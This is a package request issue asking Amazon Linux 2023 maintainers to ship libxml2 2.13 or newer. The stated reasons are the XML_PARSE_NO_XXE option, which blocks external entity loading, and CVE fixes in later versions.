[Package Request] - libxml2 2.13.x or newer (latest is 2.15.2) #1076
Description
What package is missing from Amazon Linux 2023? Please describe and include package name.
libxml2 version 2.13.0 or newer
Is this an update to existing package or new package request?
An update. Current version in AL2023 is 2.10.4.
Is this package available in Amazon Linux 2? If it is available via external sources such as EPEL, please specify.
AL2 has an even older version, 2.9.1. RHEL/Fedora appear not to have packaged anything newer than 2.12.x. I downloaded the latest Fedora Rawhide RPM and confirmed that it does not have a backport of the feature I wanted to use.
Any additional information you'd like to include. (use-cases, etc)
From libxml 2.13.0, the enum xmlParserOption now includes the option XML_PARSE_NO_XXE, which is an important security mitigation when handling untrusted XML. It disables all external entity/DTD loading which can protect against XML injection attacks to exfiltrate local files.
Ideally though, we'd just go up to the latest libxml 2.15.2, which fixes additional CVEs vs libxml 2.13.0.